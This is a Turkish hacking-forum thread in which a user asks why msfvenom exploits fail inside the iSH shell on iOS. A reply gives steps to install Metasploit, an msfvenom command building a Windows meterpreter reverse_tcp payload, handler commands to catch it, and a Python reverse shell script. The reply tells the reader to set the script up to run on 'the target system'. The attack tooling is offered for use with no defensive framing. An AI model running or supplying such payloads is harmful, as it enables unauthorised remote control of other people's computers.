İsh sheller’de Msfvenom aracılığı ile exploit kurmaya çalışıyorum

Çözüm
C
Nemesa' Alıntı:
İSH (İOS Sheller)’e metasploit kurdum, Msfvenom aracılığı ile exploit yazdım normal metasploit kodlarıyla fakat çalışmadı farklı kodları var sanırım fakat şnternette yeterli kaynak yok.
Genişletmek için tıkla ...


İSH uygulamasını açın ve güncelleyin:
apk update
apk upgrade
Genişletmek için tıkla ...

Metasploit bağımlılıklarını yükleyin:
apk add git ruby ruby-dev build-base libffi-dev python3
gem install bundler
Genişletmek için tıkla ...

Metasploit'i klonlayın ve kurun:
git clone GitHub - rapid7/metasploit-framework: Metasploit Framework
cd metasploit-framework
bundle install
Genişletmek için tıkla ...

Msfvenom ile Payload

./msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your_ip> LPORT=<your_port> -f exe >...
Genişletmek için tıkla ...
Tarihe göre sırala Oylara göre sırala
C

CH

Uzman üye
28 Ocak 2019
1,966
907
Siber
Nemesa' Alıntı:
İSH (İOS Sheller)’e metasploit kurdum, Msfvenom aracılığı ile exploit yazdım normal metasploit kodlarıyla fakat çalışmadı farklı kodları var sanırım fakat şnternette yeterli kaynak yok.
Genişletmek için tıkla ...


İSH uygulamasını açın ve güncelleyin:
apk update
apk upgrade
Genişletmek için tıkla ...

Metasploit bağımlılıklarını yükleyin:
apk add git ruby ruby-dev build-base libffi-dev python3
gem install bundler
Genişletmek için tıkla ...

Metasploit'i klonlayın ve kurun:
git clone GitHub - rapid7/metasploit-framework: Metasploit Framework
cd metasploit-framework
bundle install
Genişletmek için tıkla ...

Msfvenom ile Payload

./msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your_ip> LPORT=<your_port> -f exe > /path/to/output/payload.exe
Genişletmek için tıkla ...
Bu komutta, LHOST ve LPORT değerlerini kendi IP adresiniz ve kullanmak istediğiniz port numarası ile değiştirin.

Exploit Kullanımı

Metasploit'i başlatın:
./msfconsole
Genişletmek için tıkla ...

Exploit ve payload ayarlarını yapın:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <your_ip>
set LPORT <your_port>
exploit
Genişletmek için tıkla ...

İOS Sheller (İSH) Özel Ayarları

İSH üzerinde çalışırken, bazı farklılıklar ve ek adımlar gerekebilir. Örneğin, İSH ortamı kısıtlı olabileceği için bazı Metasploit modülleri çalışmayabilir veya belirli izinler gerekebilir. Bu durumda,

Termux veya benzeri bir uygulama kullanın: Eğer İSH üzerinde sorun yaşarsanız, Termux gibi başka bir terminal uygulamasını kullanmayı deneyin.
Port Yönlendirme ve VPN Kullanımı: iOS cihazınızda port yönlendirme yapamıyorsanız, bir VPN kullanarak dış ağ erişimini sağlayabilirsiniz.

PY Reverse Shell Exploit Örneği

import socket
import subprocess

def reverse_shell(host, port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
while True:
command = s.recv(1024).decode('utf-8')
if command.lower() == 'exit':
break
output = subprocess.run(command, shell=True, capture_output=True, text=True)
s.send(output.stdout.encode('utf-8') + output.stderr.encode('utf-8'))
s.close()

if __name__ == "__main__":
reverse_shell('<your_ip>', <your_port>)
Genişletmek için tıkla ...

Bu kodu hedef sisteme çalıştırmak üzere hazırlayabilirsiniz. '<your_ip>' ve '<your_port>' kısımlarını kendi IP adresiniz ve port numaranız ile değiştirin.
 
Oyla 0 Downvote
Çözüm
Nemesa

Nemesa

Katılımcı Üye
15 Şub 2023
297
135
System32.exe/nemesaxploit
CH' Alıntı:
İSH uygulamasını açın ve güncelleyin:


Metasploit bağımlılıklarını yükleyin:


Metasploit'i klonlayın ve kurun:

Msfvenom ile Payload


Bu komutta, LHOST ve LPORT değerlerini kendi IP adresiniz ve kullanmak istediğiniz port numarası ile değiştirin.

Exploit Kullanımı

Metasploit'i başlatın:


Exploit ve payload ayarlarını yapın:

İOS Sheller (İSH) Özel Ayarları

İSH üzerinde çalışırken, bazı farklılıklar ve ek adımlar gerekebilir. Örneğin, İSH ortamı kısıtlı olabileceği için bazı Metasploit modülleri çalışmayabilir veya belirli izinler gerekebilir. Bu durumda,

Termux veya benzeri bir uygulama kullanın: Eğer İSH üzerinde sorun yaşarsanız, Termux gibi başka bir terminal uygulamasını kullanmayı deneyin.
Port Yönlendirme ve VPN Kullanımı: iOS cihazınızda port yönlendirme yapamıyorsanız, bir VPN kullanarak dış ağ erişimini sağlayabilirsiniz.

PY Reverse Shell Exploit Örneği



Bu kodu hedef sisteme çalıştırmak üzere hazırlayabilirsiniz. '<your_ip>' ve '<your_port>' kısımlarını kendi IP adresiniz ve port numaranız ile değiştirin.
Genişletmek için tıkla ...
Çok sağolun.

CH' Alıntı:
İSH uygulamasını açın ve güncelleyin:


Metasploit bağımlılıklarını yükleyin:


Metasploit'i klonlayın ve kurun:

Msfvenom ile Payload


Bu komutta, LHOST ve LPORT değerlerini kendi IP adresiniz ve kullanmak istediğiniz port numarası ile değiştirin.

Exploit Kullanımı

Metasploit'i başlatın:


Exploit ve payload ayarlarını yapın:

İOS Sheller (İSH) Özel Ayarları

İSH üzerinde çalışırken, bazı farklılıklar ve ek adımlar gerekebilir. Örneğin, İSH ortamı kısıtlı olabileceği için bazı Metasploit modülleri çalışmayabilir veya belirli izinler gerekebilir. Bu durumda,

Termux veya benzeri bir uygulama kullanın: Eğer İSH üzerinde sorun yaşarsanız, Termux gibi başka bir terminal uygulamasını kullanmayı deneyin.
Port Yönlendirme ve VPN Kullanımı: iOS cihazınızda port yönlendirme yapamıyorsanız, bir VPN kullanarak dış ağ erişimini sağlayabilirsiniz.

PY Reverse Shell Exploit Örneği



Bu kodu hedef sisteme çalıştırmak üzere hazırlayabilirsiniz. '<your_ip>' ve '<your_port>' kısımlarını kendi IP adresiniz ve port numaranız ile değiştirin.
Genişletmek için tıkla ...
Hocam şimdide syntax error alıyorum ya
 
Oyla 0 Downvote
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.